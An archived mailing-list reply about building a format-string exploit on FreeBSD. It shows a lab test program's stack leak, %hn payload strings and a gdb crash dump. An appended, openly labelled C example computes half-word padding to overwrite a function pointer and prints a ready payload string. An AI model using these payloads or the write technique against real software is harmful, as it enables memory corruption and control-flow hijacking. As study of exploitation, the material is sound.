Vulnerability Development mailing list archives
Re: Formatstrings on *BSD
From: Ingram <Vail () gmx net>
Date: Fri, 20 Jun 2003 10:07:26 +0200 (MEST)
> [%.-16457x%8$hn%.15261x%9$hn] (35)
> ^---- First question: is your input still at %8$x and %9$x on the BSD box?
yep, see here:
uname
FreeBSD

./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc 1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0
before : ptrf() = 0x8048770 (0xbfbffad8)
buffer = [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71)
after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"
> ... Segmentation fault (core dumped)
> ^---- Second ... what does the bt look like in gdb...

Here we go; the fmt seems to corrupt eax:
gdb -core vuln.core
GNU gdb 4.18
. . .
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault.
#0  0x40517d31 in ?? ()
(gdb) bt
#0  0x40517d31 in ?? ()
#1  0x8048805 in ?? ()
#2  0x8048767 in ?? ()
#3  0x8048561 in ?? ()
(gdb) i reg
eax            0x40517d31       1079082289
ecx            0x8049a70        134519408
edx            0x280e9968       672045416
ebx            0x280e8424       672039972
esp            0xbfbffad4       0xbfbffad4
ebp            0xbfbffae0       0xbfbffae0
esi            0x1              1
edi            0x280e9960       672045408
eip            0x40517d31       0x40517d31
eflags         0x10216          66070
cs             0x1f             31
ss             0x2f             47
ds             0x2f             47
es             0x2f             47
fs             0x2f             47
gs             0x2f             47
(gdb) x/1x $eax
0x40517d31:     Cannot access memory at address 0x40517d31.

kind regards
Ingram

-- 
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Please smile! Photo gallery online with GMX, no homepage of your own needed!
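The format string under discussion, `%Nx%8$hn%Mx%9$hn` preceded by two addresses, stores one 32-bit value as two half-word writes: each `%hn` stores printf's running character count, so the two paddings have to be chosen so that the count (mod 0x10000) equals the low half of the value when `%hn` hits the target and the high half when it hits target+2, and the smaller half has to be written first because the count can only grow. The C program below is an added example, not code from this thread or from either poster; it computes those two widths, builds the string in the thread's shape, and replays its effect by measuring what each `%x` really prints rather than executing the string (so it runs safely on any host). The numbers fed to it are the ones visible in the thread's output (ptrf at 0xbfbffad8, accessForbidden at 0x80487a0, addresses reachable as `%8$` and `%9$`, an 8-byte address prefix); that the stack actually looks like that on the target box is an assumption, as is the sample stack value 0xbfbffccc used for the consumed `%x` argument.

```c
/* Added example (not from the original post): arithmetic behind a
 * format-string write of one 32-bit value as two %hn half-word stores,
 * the "%Nx%k$hn%Mx%j$hn" shape used in this thread.  Target, value and
 * parameter indices are taken from the thread's output; the stack layout
 * is an assumption and the string is measured, never executed. */
#include <stdio.h>
#include <stdint.h>

#define MIN_PAD 8   /* a 32-bit stack value prints as at most 8 hex digits */

struct hn_plan {
    unsigned pad1, pad2;    /* field widths of the two %x */
    unsigned idx1, idx2;    /* %k$ indices the two %hn write through */
    char fmt[96];           /* the format string, without the address prefix */
};

/* Choose widths so that the running character count, mod 0x10000, equals
 * the low half of `value` when %hn stores through idx_lo (target) and the
 * high half when it stores through idx_hi (target+2).  `prefix` is what is
 * already printed before the first %x (the address bytes at buffer start). */
void plan_hn_write(uint32_t value, unsigned prefix,
                   unsigned idx_lo, unsigned idx_hi, struct hn_plan *p)
{
    unsigned lo = value & 0xffffu, hi = value >> 16;
    unsigned v1, v2;

    /* the count only grows, so the smaller half is written first */
    if (lo <= hi) { v1 = lo; v2 = hi; p->idx1 = idx_lo; p->idx2 = idx_hi; }
    else          { v1 = hi; v2 = lo; p->idx1 = idx_hi; p->idx2 = idx_lo; }

    /* modular distance from the current count to each wanted half; if the
     * distance is shorter than the digits %x may print, go round once more */
    p->pad1 = (v1 - prefix) & 0xffffu;
    if (p->pad1 < MIN_PAD) p->pad1 += 0x10000u;
    p->pad2 = (v2 - v1) & 0xffffu;
    if (p->pad2 < MIN_PAD) p->pad2 += 0x10000u;

    snprintf(p->fmt, sizeof p->fmt, "%%%ux%%%u$hn%%%ux%%%u$hn",
             p->pad1, p->idx1, p->pad2, p->idx2);
}

/* Replay the string without executing it: measure how long each %x prints
 * for a plausible consumed stack value and feed the running count through
 * the two %hn stores.  Returns the 32-bit word the target would end up with. */
uint32_t simulate_hn_write(const struct hn_plan *p, unsigned prefix,
                           unsigned stack_value, unsigned idx_lo)
{
    uint16_t half[2] = {0, 0};   /* half[0] = *target, half[1] = *(target+2) */
    unsigned count = prefix;

    count += (unsigned)snprintf(NULL, 0, "%*x", (int)p->pad1, stack_value);
    half[p->idx1 == idx_lo ? 0 : 1] = (uint16_t)count;    /* first %hn */
    count += (unsigned)snprintf(NULL, 0, "%*x", (int)p->pad2, stack_value);
    half[p->idx2 == idx_lo ? 0 : 1] = (uint16_t)count;    /* second %hn */

    return (uint32_t)half[0] | ((uint32_t)half[1] << 16);
}

/* Plan and replay in one step; should hand back `value` unchanged. */
uint32_t hn_roundtrip(uint32_t value, unsigned prefix)
{
    struct hn_plan p;
    plan_hn_write(value, prefix, 8, 9, &p);          /* %8$ -> target, %9$ -> target+2 */
    return simulate_hn_write(&p, prefix, 0xbfbffcccu, 8);
}

int main(void)
{
    struct hn_plan p;
    /* constructed from the thread: ptrf lives at 0xbfbffad8 and should
     * receive accessForbidden() = 0x80487a0; "AAAABBBB" stands in for the
     * two 4-byte addresses that occupy %8$ and %9$ */
    plan_hn_write(0x080487a0u, 8, 8, 9, &p);
    printf("format : AAAABBBB%s\n", p.fmt);
    printf("result : 0x%08x\n", simulate_hn_write(&p, 8, 0xbfbffcccu, 8));
    return 0;
}
```

For the thread's value the planner writes the high half first (0x0804 is the smaller one), giving `%2044x%9$hn%32668x%8$hn`; the replay shows the two stores landing 0x0804 in the upper half-word and 0x87a0 in the lower one. The MIN_PAD rule is what keeps a consumed `%x` argument with eight digits from overshooting a tiny width.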
Current thread:
- Formatstrings on *BSD Vail (Jun 18)
- Re: Formatstrings on *BSD KF (Jun 18)
- <Possible follow-ups>
- Re: Formatstrings on *BSD Ingram (Jun 21)
- Re: Formatstrings on *BSD The Itch (Jun 21)